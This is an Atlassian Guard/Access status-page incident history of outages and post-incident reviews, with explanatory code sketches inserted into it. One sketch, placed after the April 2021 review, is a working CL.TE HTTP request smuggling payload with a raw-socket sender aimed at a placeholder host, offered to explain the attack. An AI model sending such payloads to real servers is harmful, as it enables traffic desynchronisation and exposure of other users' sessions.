Historical record of incidents for Guard
Report: "Customers may experience delays or failures receiving emails"
Last update: We were experiencing cases of degraded performance for outgoing emails from Confluence, Jira Work Management, Jira Service Management, Jira, Opsgenie, Trello, Atlassian Bitbucket, Guard, Jira Align, Jira Product Discovery, Atlas, Compass, and Loom Cloud customers. The system is recovering and mail is being processed normally as of 16:45 UTC. We will continue to monitor system performance and will provide more details within the next hour.
Report: "Issues with authentication across multiple services"
Last update: Monitoring has indicated that users are no longer receiving the error messages caused by this issue and it should now be fully resolved.
A fix for the issue causing authentication errors across multiple apps has been rolled out. We will provide a further update when we can confirm the issue has been fully resolved.
We are aware of issues relating to authentication resulting in 503 gateway error messages. Our team is investigating with urgency and will provide an update when available.
Report: "Issues with authentication across multiple services"
Last update: We are aware of issues relating to authentication resulting in 503 gateway error messages. Our team is investigating with urgency and will provide an update when available.
Report: "Issues loading Administration across Atlassian Products"
Last update: Between 00:00 UTC and 01:05 UTC on 14 April, users attempting to load the Administration page for Atlassian products encountered errors. The issue has been resolved and the service is operating normally.
We are currently investigating this issue.
Report: "Issues loading Administration across Atlassian Products"
Last update: We are currently investigating this issue.
Report: "Admin hub not responding"
Last update: Between November 1st, 02:57 AM UTC, and November 1st, 05:03 AM UTC, we experienced an issue with the Atlassian Admin hub not responding to some users. The issue has been resolved, and the service is operating normally.
We have identified the root cause of the Atlassian Admin hub not responding and have mitigated the problem. We are now monitoring closely.
We continue to work on resolving the issue with the Atlassian admin hub not responding. We have identified the root cause and expect recovery shortly.
We are investigating reports of intermittent errors when logging into the Atlassian admin hub at https://admin.atlassian.com. Once we identify the root cause, we will provide more details.
Report: "Errors with provisioning services"
Last update: Between 25-Oct-2024 at 9:50 AM UTC and 25-Oct-2024 at 4:52 PM UTC, we identified intermittent errors in external directory configuration in the admin hub (admin.atlassian.com), https://id.atlassian.com/manage-profile, and provisioning configurations that impacted all Atlassian Guard cloud customers. The issue has been resolved and the service is operating normally.
We continue to investigate the intermittent errors in external directory configuration in the admin hub (admin.atlassian.com), https://id.atlassian.com/manage-profile, and provisioning configurations that are impacting all Atlassian Guard cloud customers. As the investigation proceeds, we will provide more updates.
We are continuing to investigate intermittent errors in external directory configuration in the admin hub (admin.atlassian.com), https://id.atlassian.com/manage-profile, and provisioning configurations that are impacting all Guard Cloud customers. We will provide updates as we learn more.
We are again investigating intermittent errors for external directory configuration in the admin hub (admin.atlassian.com), https://id.atlassian.com/manage-profile, and provisioning configurations that are impacting all Guard Cloud customers. We will provide more details within the next hour.
On 25-Oct-2024 at 9:50 AM UTC, we identified intermittent errors for external directory configuration in the admin hub (admin.atlassian.com), https://id.atlassian.com/manage-profile, and provisioning configurations that are impacting all Guard Cloud customers. We have taken action to mitigate this issue and we are now monitoring it closely.
We are investigating reports of intermittent errors for external directory configuration in the admin hub (admin.atlassian.com), https://id.atlassian.com/manage-profile, and provisioning configurations, which are currently not loading. Guard Cloud customers are affected by this issue. We will provide more details once we identify the root cause.
Report: "Some admins unable to see some user/group memberships in AdminHub"
Last update: Between 2024-10-18 05:40 UTC-7 and 2024-10-18 08:40 UTC-7, we experienced an outage affecting user/group memberships in AdminHub for Confluence, Jira Work Management, Jira Service Management, Jira, and Guard. The issue has been resolved and the service is operating normally.
We have received reports of intermittent errors for some Cloud customers, specifically admins who are unable to see group memberships in AdminHub. We have identified the root cause and expect recovery shortly.
Report: "Identity is not syncing new user and group information"
Last update: Between 02:35 UTC and 03:55 UTC on Aug 26, we experienced failing Identity sync for Jira Work Management, Jira Service Management, Jira, and Guard. The issue has been resolved and the service is operating normally. All affected Jira customers have been synced with Identity, and there is no need to wait 24 hours for a full sync.
The bug has been identified and fixed. However, it could take up to 24 hours from 03:55 UTC for user and group changes to be reflected correctly. As a workaround, you may need to perform a new user or group change.
Between 02:35 UTC and 03:55 UTC, due to a bug in Identity, some changes to user and group settings were not reflected in Jira.
Report: "Atlassian Guard billing system is flagging more users as billable than it should"
Last update: We have identified the root cause and have mitigated the problem. The issue has been resolved and the service is operating normally.
We are continuing to investigate this issue.
We are investigating an issue with Atlassian Guard billing marking more users as billable than expected, which is impacting some Atlassian Guard customers. We will provide more details soon.
Report: "AdminHub Authentication Policies and Identity Providers sections are slow to load, or not loading at all"
Last update: The issue has been resolved and the service is operating normally.
We have identified the root cause and have mitigated the problem. We are now monitoring closely.
We've currently mitigated the issue and we're monitoring for any related errors.
We're still investigating an issue that may cause the Authentication Policies and Identity Providers sections, and the new organization creation experience in admin.atlassian.com, to load slowly or fail to load. This does not affect authentication policies already in place or linked identity providers, but it may prevent customers from modifying or creating authentication policies and from creating new organizations in Atlassian Cloud.
We're currently investigating an issue that may cause the Authentication Policies and Identity Providers sections, and the new organization creation experience in admin.atlassian.com, to load slowly or fail to load. This does not affect authentication policies already in place or linked identity providers, but it may prevent customers from modifying or creating authentication policies and from creating new organizations in Atlassian Cloud. We will provide more details once we identify the root cause.
Report: "Delayed Audit Log Events"
Last update: Between 30th July 20:06 UTC and 31st July 08:19 UTC, we experienced delayed processing of Audit Log events for Guard. The issue has been resolved and the service is operating normally.
We are monitoring delayed processing of audit log events impacting customers. These delayed events are queued for processing. We will provide an update when processing is back to normal.
Report: "Some products are hard down"
Last update: Between 03-07-2024 20:08 UTC and 03-07-2024 20:31 UTC, we experienced downtime for some of the products. The issue has been resolved and the service is operating normally.
We have mitigated the problem and continue looking into the root cause. The outage lasted from 8:08 PM UTC to 8:31 PM UTC on 03/07. We are now monitoring closely.
We are investigating an issue with <FUNCTIONALITY IMPACTED> that is impacting <SOME/ALL> Atlassian, Atlassian Partners, Atlassian Support, Confluence, Jira Work Management, Jira Service Management, Jira, Opsgenie, Atlassian Developer, Atlassian (deprecated), Trello, Atlassian Bitbucket, Guard, Jira Align, Jira Product Discovery, Atlas, Atlassian Analytics, and Rovo Cloud customers. We will provide more details within the next hour.
Report: "Azure Sync for nested groups is not syncing new user and group information"
Last update: The issue has been resolved and the service is operating normally.
We are investigating cases of degraded performance for some Atlassian Guard customers. We will provide more details within the next hour.
Report: "Unavailability of the Last Active Timestamp status"
Last update: Between 1:39 AM UTC and 2:01 PM UTC, we experienced unavailability of the Last Active Timestamp status in the new user experience under the Cloud organization. The issue has been resolved and the service is operating normally.
We are investigating an issue with the unavailability of the Last Active Timestamp status in the new user experience under the Cloud organization that is impacting some of the Cloud products. We will provide more details shortly.
Report: "Atlassian account session invalidations"
Last update:

### **SUMMARY**

On March 19, 2021, a security researcher participating in our [bug bounty program](https://bugcrowd.com/atlassian) notified Atlassian of a vulnerability in our Edge Networking Infrastructure that allowed specially-crafted HTTP requests to interfere with and disrupt the expected handling of network traffic, using a technique known as HTTP request smuggling (sketched after this report's updates). This vulnerability affected the following Atlassian cloud products: Jira Work Management, Jira Service Management, Jira Software, Confluence, Bitbucket and Statuspage. We were able to patch the vulnerability on April 16, 2021. Out of an abundance of caution, we began the additional step of invalidating all established user sessions across all Atlassian products between April 16 and April 28, 2021.

### **IMPACT**

The HTTP request smuggling vulnerability was not exploited and no credentials were compromised throughout this security incident. In the process of validating our patch for the vulnerability, requests related to four user sessions were mishandled by our networking infrastructure, causing some users to be presented with a page showing the site name ([sitename.atlassian.net](http://sitename.atlassian.net)) and email address of another user. No other data or information was disclosed to or accessed by unauthorized users during the course of the testing and validation. We have since invalidated all sessions on the affected products.

### **ROOT CAUSE**

The root cause was HTTP request smuggling, which allowed specially-crafted HTTP requests to interfere with and disrupt the expected handling of traffic through the load balancers used by Atlassian’s Network Edge.

### **REMEDIAL ACTIONS**

Atlassian has a [comprehensive set of security practices](https://www.atlassian.com/trust/security/security-practices) in place to ensure we protect customer information and offer reliable and secure services. However, we also recognize that security incidents may still happen, and it is just as important to have effective methods for handling them. In this case we utilized our security incident response mechanism to:

* develop a patch for the smuggling vulnerability
* deploy the patch to all production load balancing infrastructure
* invalidate all established user sessions.

We apologise to our customers that were impacted throughout the duration of this security incident and thank you for your understanding.

Thanks,

Atlassian Customer Support
Between 15/Apr/21 17:20 PDT and 27/Apr/21 10:00 PM PDT, some cloud customers of Atlassian Support, Confluence, Jira Work Management, Jira Service Management, Jira Software, Opsgenie, Atlassian Developer, Trello, Atlassian Bitbucket, Atlassian Access, and Jira Align were logged out of their accounts. The issue has been resolved and the service is operating normally.
We are investigating an incident impacting Jira Cloud, Confluence Cloud, Bitbucket Cloud, and Statuspage. During our investigation, users may be logged out of their accounts as we work towards a resolution. We are continuing to investigate and will update this incident with more details as they are available.
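The post-incident review above names the technique but doesn't show what it looks like on the wire. As a rough illustration of the attack class only, not the researcher's actual report or Atlassian's infrastructure (the host and smuggled path below are hypothetical), the classic CL.TE variant works by making a Content-Length-parsing front end and a Transfer-Encoding-parsing back end disagree about where one request ends and the next begins:

```python
# Minimal sketch of a CL.TE HTTP request smuggling payload -- the attack class
# described in the review above. Host and smuggled path are hypothetical.
# Never send traffic like this to systems you are not authorized to test.
import socket

# Bytes after the blank line. A chunked-parsing back end stops at the "0" chunk
# and treats the trailing "GET /smuggled ..." fragment as the START of the next
# request, so it is glued onto whatever request arrives next on the connection.
body = b"0\r\n\r\nGET /smuggled HTTP/1.1\r\nFoo: x"

# A Content-Length-parsing front end (load balancer) sees exactly ONE request.
request = (
    b"POST / HTTP/1.1\r\n"
    b"Host: front-end.example.test\r\n"
    b"Content-Length: " + str(len(body)).encode() + b"\r\n"
    b"Transfer-Encoding: chunked\r\n"
    b"\r\n" + body
)

def send_raw(host: str, payload: bytes, port: int = 80) -> bytes:
    """Send raw bytes over TCP and return the first chunk of the response."""
    with socket.create_connection((host, port), timeout=5) as sock:
        sock.sendall(payload)
        return sock.recv(4096)
```

Patching the edge load balancers so both layers agree on request framing, and then invalidating every session that could have been touched, closes exactly this disagreement, which matches the remedial actions described above.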
Report: "Partial outage on Atlassian Access and Support"
Last update: Between 19:15 UTC and 20:00 UTC, we experienced an outage for authentication policies, get API tokens, claiming domains, and managed accounts functionality for Atlassian Support and Atlassian Access. The issue has been resolved and the service is operating normally.
We are investigating an issue with authentication policies, get API tokens, claiming domains, and managed accounts that is impacting Atlassian Access and Support. We will provide more details within the next hour.
Report: "Some customers may be experiencing issues with Account Management, Authentication Policies, Admin Insights and Domain Claims"
Last update: The AWS Elasticsearch failures have stopped occurring. The systems are functioning well.
The issue has been identified as an AWS Elasticsearch issue. We have engaged AWS customer support to help resolve it.
We are currently investigating the issue. We have identified the failing service and are trying to find the root cause.
Report: "Data on Account Management pages are taking longer to appear than normal"
Last update: The incident has been resolved.
We have fixed the performance issues that some customers had reported. We'll continue to monitor the behavior.
Our data processing infrastructure is running behind, which is causing inaccuracies on the Account Management pages. No data has been lost, and the system should be caught up shortly.
Report: "Partial Domain Claim Verifications Failing"
Last update: Duplicate statuspage entry sent by mistake. Please see future updates at https://access.status.atlassian.com/incidents/mdpn5plfcbc9
We are investigating intermittent errors with Domain Claim Verification for some Atlassian Access Cloud customers. We will provide more details once we identify the root cause. There is no impact to your users' ability to access Atlassian products.
Report: "Authentication policies not reflecting the changes on GUI"
Last update: Between 14:00 UTC and 17:00 UTC, we experienced an issue where authentication policy changes were not being reflected for Atlassian Access. The issue has been resolved and the service is operating normally.
We are investigating an issue with authentication policies not reflecting changes in the GUI for some Cloud customers. We will provide more details once we identify the root cause.
Report: "Domain verification is failing"
Last update: The fix has been deployed and the issue has been resolved.
The team has identified the underlying issue with an external DNS provider's API and added a test to verify that this specific behavior doesn't regress in the future. The fix is being prepared and will be deployed when ready. Once the rollout is complete, the team will begin an async process to force re-verification of all claimed domains.
Our domain verification system is seeing inconsistent DNS TXT record responses. This inconsistency is causing domain claim verification, and re-verification of already-claimed domains, to fail with a "missing token" status (a sketch of this kind of check follows this report's updates). There is no detected impact on product access due to this incident at this time, and we have temporarily paused our re-verification access-revocation system until the root cause is identified and resolved. We will provide more details when available.
We are investigating an issue with Domain Verification that is impacting all Atlassian Access customers. We will provide more details within the next hour.
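For context on the "missing token" status mentioned above: domain verification generally works by having the customer publish a provider-supplied token in a DNS TXT record, which the verifier then looks up. The sketch below is a minimal, hypothetical version of that check using the dnspython library; the token format and record placement are assumptions for illustration, not Atlassian's actual scheme.

```python
# Minimal sketch of a DNS TXT domain-verification check (hypothetical scheme).
# Requires dnspython: pip install dnspython
import dns.exception
import dns.resolver

def txt_contains_token(domain: str, expected_token: str) -> bool:
    """Return True if any TXT record on `domain` contains the expected token."""
    try:
        answers = dns.resolver.resolve(domain, "TXT")
    except (dns.resolver.NXDOMAIN, dns.resolver.NoAnswer, dns.exception.Timeout):
        # This is the case that surfaces as a "missing token" status.
        return False
    for rdata in answers:
        # A TXT record may be split into multiple <=255-byte strings; join them.
        value = b"".join(rdata.strings).decode("utf-8", errors="replace")
        if expected_token in value:
            return True
    return False
```

Because resolvers can return inconsistent answers, as they did in this incident, a production verifier would typically retry failed lookups over a window before declaring a domain unverified, and pause any access-revocation automation in the meantime, which is the mitigation described above.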
Report: "Domain verification is failing"
Last update: We have confirmed that the notification regarding domain verification failure was triggered by last Friday's incident. The service is operating normally. Please contact support at https://support.atlassian.com/contact if you encounter any issues.
We are investigating an issue with Domain Verification that is impacting all Atlassian Access customers. We will provide more details within the next hour.
Report: "Issues with Relay State parameter upon Login"
Last update: Between June 24th, 2021 13:09 UTC and June 29th, 2021 18:16 UTC, we experienced issues with relay states configured in Atlassian Access. The issue has been resolved and the service is operating normally.
We are currently investigating an issue with relay state that is impacting Atlassian Access customers. We will provide more details within the next hour.
Report: "Provisioning of new instances is failing"
Last update: Between 22:00 UTC and 00:00 UTC, we experienced a delay in processing some activations and provisioning of new instances for Confluence, Jira Work Management, Jira Service Management, Jira Software, and Atlassian Access. The issue has been resolved and the service is operating normally. The small number of delayed requests will be processed shortly.
Provisioning of new instances and sign-ups are now working properly, and the root cause has been addressed. We are now monitoring closely.
Due to a burst of retries, this problem has continued to impact new provisioning requests. We continue to work on resolving the underlying issue. We have identified the root cause and expect full recovery shortly.
We have identified the root cause of the failed activations and have mitigated the problem. We are now monitoring closely.
We are investigating reports of failing provisioning of new instances. We will provide more details once we identify the root cause.
Report: "Multiple products experiencing elevated error rates for cloud customers"
Last update:

### **SUMMARY**

On December 7, 2021, between 15:54 UTC and December 8, 2021, at 01:55 UTC, Atlassian Cloud services using AWS services in the US-EAST-1 region experienced a failure. This affected customers using Atlassian Access, Bitbucket Cloud, Compass, Confluence Cloud, the Jira family of products, and Trello. Products were unable to operate as expected, resulting in partial or complete degradation of services. The event was triggered by an AWS networking outage in US-EAST-1 affecting multiple AWS services, which led to the inability to access AWS APIs and the AWS management console. The incident was first reported by Atlassian Access, whose monitoring detected faults accessing DynamoDB services in the region. Recovery of affected Atlassian services occurred on a service-by-service basis from 2021-12-07 21:50 UTC, when the underlying AWS services also began to recover. Full recovery of Atlassian Cloud services was announced at 2021-12-08 01:55 UTC.

### **IMPACT**

The overall impact occurred between December 7, 2021, 15:54 UTC and December 8, 2021, 01:55 UTC. The incident caused partial to complete service disruption of Atlassian Cloud services in the US-EAST-1 region. Product-specific impacts are listed below.

The primary impact for customers of Jira Software, Jira Service Management and Jira Work Management hosted in the US-EAST-1 region was being unable to scale up, which caused slow response times for web requests and delays in background job processing, including webhooks in the AP region. There was significant latency for customers accessing Jira. Some customers experienced service unavailability while the incident took place.

Jira Align experienced an email outage for US customers due to the AWS service outage, which affected many AWS services including Simple Email Service. A small percentage of Jira Align emails were not sent due to the AWS incident.

Bitbucket Pipelines was unavailable and steps failed to be executed. For Jira Automation, tenants' rule executions were delayed since CloudWatch was affected.

Confluence experienced minor impact due to upstream services impacting user management, search, notifications, and media. At the same time, Confluence saw elevated error rates related to the inability to scale up, and GraphQL had higher latencies.

Trello's email-to-board and dashcards features experienced degraded performance.

Atlassian Access reported that product transfers from one organization failed intermittently. Admins were not able to update features like IP Allowlist, Audit Logs, Data Residency, Custom Domain Email Notification and Mobile Application Management, although users were able to access and view these features. During the incident, emails to admins were delayed. There was a degraded experience when creating and deleting API tokens.

Statuspage was largely unaffected. However, notification workers could not scale up and communications to customers were delayed, though they could be replayed later. The incident also impacted users trying to sign in to manage portals and private pages.

Compass experienced a minor impact on its ability to write to its primary database store. No core features were affected.

Atlassian's customers could have experienced stale data issues in production in US-EAST-1 for ~30s, against an expected 5s at p99, because of delayed token resolution. The provisioning of new cloud tenants was also impacted until the recovery of the services.

### **ROOT CAUSE**

The issue was caused by a problem with several network devices within AWS’s internal network. These devices were receiving more traffic than they were able to process, which led to elevated latency and packet loss. As a result, multiple AWS services which Atlassian's platform relies on were affected, causing service degradation and disruption to the products mentioned above. For more information about the root cause, see [Summary of the AWS Service Event in the Northern Virginia (US-EAST-1) Region](https://aws.amazon.com/message/12721). There were no relevant Atlassian-driven events in the lead-up that have been identified to cause or contribute to this incident.

### **REMEDIAL ACTIONS PLAN & NEXT STEPS**

We know that outages impact your productivity. We are taking immediate steps to improve the Atlassian platform's resiliency and availability to reduce the impact of such an event in the future. While Atlassian's Cloud services do run in several regions (US EAST and WEST, AP, EU CENTRAL and WEST, among others) and data is replicated across several regions to increase resilience against outages of this magnitude, we have identified and are taking actions that include improvements to our region failover process. This will minimize the impact of future outages on Atlassian’s Cloud services and provide better support for our customers.

We are prioritizing the following actions to avoid repeating this type of incident:

* Enhance and strengthen our plans for cross-region resiliency and disaster recovery, including: continue practicing region failover in production, and investigate and implement better resilience strategies for services, Active/Active or Active/Passive (a minimal sketch follows this report's updates).
* Improve and adopt multi-region architecture for services that require it.
* Exercise wargaming scenarios that simulate this outage to assess the customer view of the incident. This will allow us to create further action items to improve our region failover process.

We apologize to customers whose services were impacted during this incident.

Thanks,

Atlassian Customer Support
Between 2021/12/07 17:40 UTC and 2021/12/08 12:45 UTC, we experienced elevated error rates for some operations. The issue has been resolved and the service is operating normally.
We have started to see recovery for this issue involving elevated error rates for multiple products. We are now monitoring closely and expect recovery shortly.
We continue to work on resolving the incident with elevated error rates for multiple products. We have identified the root cause and will provide additional updates as soon as possible.
We are currently investigating an incident resulting in elevated error rates for multiple products. We will provide additional updates as soon as possible.
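The remediation plan above mentions Active/Active and Active/Passive strategies without spelling them out. At its simplest, Active/Passive failover means probing a per-region health endpoint and routing to a standby region when the primary is unhealthy. The sketch below is only an illustration of that idea; the region names and URL scheme are hypothetical, and real failover (including Atlassian's) also involves data replication and DNS or routing changes, not client-side probing alone.

```python
# Minimal sketch of client-side Active/Passive region failover (illustrative
# only; region names and the health-check URL scheme are hypothetical).
import urllib.error
import urllib.request

REGIONS = ["us-east-1", "us-west-2"]  # active primary first, passive standby next

def healthy(region: str, timeout: float = 2.0) -> bool:
    """Probe a hypothetical per-region health endpoint."""
    url = f"https://service.{region}.example.com/healthz"
    try:
        with urllib.request.urlopen(url, timeout=timeout) as resp:
            return resp.status == 200
    except OSError:  # URLError, timeouts, and connection errors subclass OSError
        return False

def pick_region() -> str:
    """Return the first healthy region, failing over in declared order."""
    for region in REGIONS:
        if healthy(region):
            return region
    raise RuntimeError("no healthy region available")
```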
Report: "SSO IDP initiated logins and 2FA is failing intermittently"
Last update: Between 2022/03/14 00:37 UTC and 2022/03/14 21:40 UTC, we experienced intermittent errors while logging in with SSO or using two-step verification for Atlassian Access customers. The issue has been resolved and the service is operating normally.
We are continuing to monitor for any further issues.
We have rolled back a recent commit from Sign-in-service and started to see service recovery. We are now monitoring closely and expect service recovery for all impacted customers.
We are investigating reports of intermittent errors while logging in with SSO or using two-step verification for Atlassian Access customers. We will provide more details once we identify the root cause.
Report: "Multiple sites showing down/under maintenance"
Last update: Earlier this month, several hundred Atlassian customers were impacted by a site outage. We have published a Post-Incident Review which includes a technical deep dive on what happened, details on how we restored customers' sites, and the immediate actions we’ve taken to improve our operations and approach to incident management. [https://www.atlassian.com/engineering/post-incident-review-april-2022-outage](https://www.atlassian.com/engineering/post-incident-review-april-2022-outage)
We have restored impacted customer sites and the service is operating normally. If you need assistance, please reply to your support ticket so that our engineers can work with you. If you have any trouble accessing your support ticket, contact us at https://support.atlassian.com/contact/#/ (choose the Billing, Payments, & Pricing options from the drop down menu). Our teams will be working on a detailed Post Incident Report to share publicly by the end of April.
We have now restored our customers impacted by the outage and have reached out to key contacts for each affected site. Our support teams are working with individual customers through any site specific needs. If you need assistance, please reply to your support ticket so that our engineers can work with you as soon as possible. If you have any trouble accessing your support ticket, contact us at https://support.atlassian.com/contact/#/ (choose the Billing, Payments, & Pricing options from the drop down menu).
We have now restored 99% of users impacted by the outage and have reached out to all affected customers. Our teams are available to help customers with any concerns. If you need assistance, please reply to your support ticket so that our engineers can work with you. If you have any trouble accessing your support ticket, contact us at https://support.atlassian.com/contact/#/ (choose the Billing, Payments, & Pricing options from the drop down menu).
We have now restored 85% of users impacted by the outage and will continue to get sites back to customers for validation over the weekend. As we hand your restored site over to you for validation, please reach out to our teams should you find any issues so that our support engineers can work to get you fully operational. You can contact us at https://support.atlassian.com/contact/#/ (choose the Billing, Payments, & Pricing options from the drop down menu).
We have now restored 78% of users impacted by the outage as we continue to move with more speed and accuracy. Our teams will continue to restore sites through the weekend, and we expect to have all sites restored no later than end of day Tuesday, April 19th PT. As we restore your site and hand it over to you for validation, please reach out to our teams should you find any issues so that our support engineers can work to get you fully restored. You can contact us at https://support.atlassian.com/contact/#/ (choose the Billing, Payments, & Pricing options from the drop down menu).
We have made significant progress over the last 24 hours and have now restored functionality for 62% of users impacted by the outage. We have also doubled the size of the batches we are pushing through the restoration process, which was a result of optimizing automated processes as well as accelerating our restoration speed. Our global engineering teams continue to work 24/7, and we expect to progress quickly through technical restoration of remaining customer sites over the weekend. If you do not have access to your open ticket, please contact us at https://support.atlassian.com/contact/#/ (choose the Billing, Payments, & Pricing options from the drop down menu).
We have now restored functionality for 55% of users impacted by the outage. With automation in full effect, we have significantly increased the pace at which we are conducting technical restoration of affected customer sites, and we have reduced the time required for the validation of restored sites by half. If you are still experiencing an outage and do not have access to your open ticket, please contact us at https://support.atlassian.com/contact/#/ (choose the Billing, Payments, & Pricing options from the drop down menu).
We have now restored functionality for 53% of users impacted by the outage. As outlined in yesterday’s update, we are restoring affected customers using a three-step process:

1. Technical restoration of affected sites
2. Internal validation of restored sites
3. Validating with affected customers before enabling their users

By automating some of our validation steps, we have now reduced time for internal validation of restored sites by half, which allows our support engineers to more quickly engage restored customers for validation and full site handover. If you are still experiencing an outage and do not have access to your open ticket, please contact us at https://support.atlassian.com/contact/#/ (choose the Billing, Payments, & Pricing options from the drop down menu).
We have restored functionality for 49% of users impacted by the outage. We are taking a batch-based approach to restoring customers, and to date this process has been semi-automated. We are beginning to shift towards a more automated process to restore sites. That said, there are still a number of steps required before we hand a site to customers for review and acceptance. We are restoring affected customers, identified by a mix of multiple variables including site size, complexity, edition, tenure, and several other factors, in groups of up to 60 at a time. The full restoration process involves our engineering teams, our customer support teams, and our customer, and has three steps:

1. Technical restoration involving meta-data recovery, data restores across a number of services, and ensuring the data across the different systems is working correctly for product and ecosystem apps
2. Verification of site functionality to ensure the technical restoration has worked as expected
3. Lastly, working directly with the affected customer to enable them to verify their data and functionality before enabling for their users

We have also contacted all customers who are *up next* for step 3 in the site restoration process described above. These customers are aware that they are next in queue through their support ticket and/or via a support engineer. We have proactively reached out to technical contacts and system admins at all impacted customers, and opened support tickets for each of them. However, we learned that some customers have not yet heard from us or engaged with our support team. If you are experiencing an outage and do not have access to your open ticket, please contact us at https://support.atlassian.com/contact/#/ (choose the Billing, Payments, & Pricing options from the drop down menu). For more information from our engineering team, please read our update from our CTO, Sri Viswanath: https://www.atlassian.com/engineering/april-2022-outage-update
The team is continuing the restoration process for the ~400 impacted customers. We have restored functionality for 45% of impacted users. As a reminder, this incident is not a result of a cyber attack, and most of our restored customers have not seen any data loss. You can read a more detailed technical overview of the situation directly from our CTO, Sri Viswanath, in our Engineering blog - https://www.atlassian.com/engineering/april-2022-outage-update
The team is moving through the restoration process this week and is accelerating toward recovery. Functionality for 40% of impacted users has been restored.
A small number of Atlassian customers continue to experience service outages and are unable to access their sites. Our global engineering teams are working 24/7 to make progress on this incident. At this time, we have rebuilt functionality for over 35% of the users who are impacted by the service outage, with no reported data loss. The rebuild stage is particularly complex due to several steps that are required to validate sites and verify data. These steps require extra time, but are critical to ensuring the integrity of rebuilt sites. We apologize for the length and severity of this incident and have taken steps to avoid a recurrence in the future.
A dedicated team continue to work 24/7 to expedite service recovery. Restoration of all customers remains our top priority. We hear and appreciate all the feedback from our valued customers and are taking every necessary step to both restore full service and ensure site integrity as soon as possible.
We are still working 24/7 to restore service to affected customers. We have restored partial access for some customers and will be continuing to restore access into next week.
We continue to work 24/7 to restore service to affected customers. We have restored partial access for some customers and will be continuing to restore access into next week.
Our teams are committed to restoring each customer’s service as soon as possible and are working through the weekend toward recovery.
The restoration process is underway. At this time we have no new significant updates, but the team continues to work around the clock to bring our customers back online.
Our team is working 24/7 to progress through site restoration work. Core functionality has been restored across a number of sites. We are continuously improving the process with the aim of accelerating the restoration process from here.
The team is continuing the restoration process through the weekend and working toward recovery. We are continuously improving the process based on customer feedback and applying those learnings as we bring more customers online.
Restoration work to restore sites is underway and will continue into the weekend. We are taking a controlled and hands-on approach as we gather feedback from customers to ensure the integrity of these site restorations.
We have started successfully restoring sites and continue to work on restoration to a wider cohort of customers. We are taking a controlled and hands-on approach as we gather feedback from customers to ensure the integrity of these site restorations.
We have started successfully restoring sites and continue to work on restoration for a wider cohort of customers. We are taking a controlled and hands-on approach as we gather feedback from customers to ensure the integrity of this first round of restorations; the plan remains the same as in our last update.
We continue to work on partial restoration for a cohort of customers. The plan, to take a controlled and hands-on approach as we gather feedback from customers to ensure the integrity of this first round of restorations, remains the same as in our last update.
We continue to work on partial restoration for the first cohort of customers. The plan, to take a controlled and hands-on approach as we gather feedback from customers to ensure the integrity of this first round of restorations, remains the same as in our last update.
We are beginning partial restoration to a cohort of customers. The early stages of this process will be controlled and hands-on, as we work with customers live to get feedback and ensure that restoration is working well before we accelerate the process for the next cohort. We will continue to post updates here as we move along this process.
We are continuing work in the verification stage on a subset of instances. Once reenabled, support will update accounts via opened incident tickets. Restoration of customer sites remains our first priority and we are coordinating with teams globally to ensure that work continues 24/7 until all instances are restored.
We are continuing to move through the various stages for restoration. The team is currently in the verification stage on a subset of instances. Successful verification will then allow us to move to reenabling those sites. Once reenabled, support will update accounts via opened incident tickets. Our efforts will continue 24x7 through this process until all instances are restored.
We are continuing to work on the resolution of the incidents for some Jira Work Management, Jira Service Management, Confluence, Jira Software, Atlassian Access, Jira Product Discovery, and Opsgenie Cloud customers. We will provide updates every 3 hours.
We continue to work on the resolution of the incident for a number of our Jira Work Management, Jira Service Management, Confluence, Jira Software, Atlassian Access, Jira Product Discovery, and Opsgenie Cloud customers. We can confirm this is not impacting all customers but remains a high priority for Atlassian as our dedicated team of SMEs work 24/7 to restore the sites as soon as possible. We will provide more detail as we progress through resolution.
We continue to work on the resolution of the incident for a number of our Jira Work Management, Jira Service Management, Confluence, Jira Software, Atlassian Access, Jira Product Discovery, and Opsgenie Cloud customers. This continues to be a high priority for Atlassian, and while we have made progress, these applications still remain unavailable for some customers. We will provide more detail as we progress through resolution.
We continue to work through the defined processes to resolve the issues impacting some customers of Jira Work Management, Jira Service Management, Confluence, Jira Software, Atlassian Access, Jira Product Discovery, and Opsgenie Cloud. We are progressing through the defined stages and will continue to update this Statuspage as further details become available. We will provide more detail as we progress through resolution.
We continue to work through the defined processes to resolve the issues impacting some customers of Jira Work Management, Jira Service Management, Confluence, Jira Software, Atlassian Access, Jira Product Discovery, and Opsgenie Cloud. We are progressing through the defined stages and will update Statuspage again in one hour. We will provide more detail as we progress through resolution.
We have defined two processes for resolving the issues impacting some customers of Jira Work Management, Jira Service Management, Confluence, Jira Software, Atlassian Access, Jira Product Discovery, and Opsgenie Cloud. These processes each involve multiple stages of work. We are currently working through them and will update Statuspage again in one hour. We will provide more detail as we progress through resolution.
We continue to work on issues with multiple instances showing as under maintenance, impacting some Jira Work Management, Jira Service Management, Confluence, Jira Software, Atlassian Access, Jira Product Discovery, and Opsgenie Cloud customers. We have identified the root cause and have a two-pronged strategy. We are currently working on manual restoration for a handful of tenants.
We continue to work on issues with multiple instances showing as under maintenance, impacting some Jira Work Management, Jira Service Management, Confluence, Jira Software, Atlassian Access, and Opsgenie Cloud customers. We have identified the root cause and are planning mitigation steps.
We are investigating an issue with multiple Cloud instances showing as under maintenance that is impacting some Jira Work Management, Confluence, Jira Service Management, Jira Software, and Atlassian Access Cloud customers. We will provide more details within the next hour.
Report: "admin.atlassian.com is not accessible"
Last update: Between 09:52 AM UTC and 12:47 PM UTC, we experienced an issue impacting access to admin.atlassian.com through the browser. The issue has been resolved and the service is operating normally.
We are gradually seeing sites recover access to admin.atlassian.com through the browser. We're continuing to monitor the service and deploy the fix.
We are investigating an issue with Atlassian Access that is impacting access to admin.atlassian.com through the browser. We will provide more details within the next hour.
Report: "Errors when deactivating managed accounts for Atlassian Access customers"
Last update: Between 3:35 and 7:10 UTC, we experienced a Billing and Provisioning issue for Confluence, Jira Work Management, Jira Service Management, Jira Software, Atlassian Bitbucket, and Atlassian Access. The issue has been resolved and the service is operating normally.
We have identified an issue which is impacting Billing and Provisioning. We will provide more details once we identify the root cause.
We are currently investigating errors when deactivating managed accounts for Atlassian Access customers. We will provide more details once we identify the root cause.
Report: "Atlassian cloud product signup timeout"
Last update: Between 08:20 UTC and 09:30 UTC, we experienced degraded performance on new account signups for Confluence, Jira Work Management, Jira Service Management, Jira Software, Atlassian Bitbucket, Atlassian Access, Atlas, and Compass. The issue has been resolved and the service is operating normally.
We are investigating reports of intermittent errors for Confluence, Jira Work Management, Jira Service Management, Jira Software, Atlassian Bitbucket, Atlassian Access, Atlas, and Compass Cloud customers. We will provide more details once we identify the root cause.
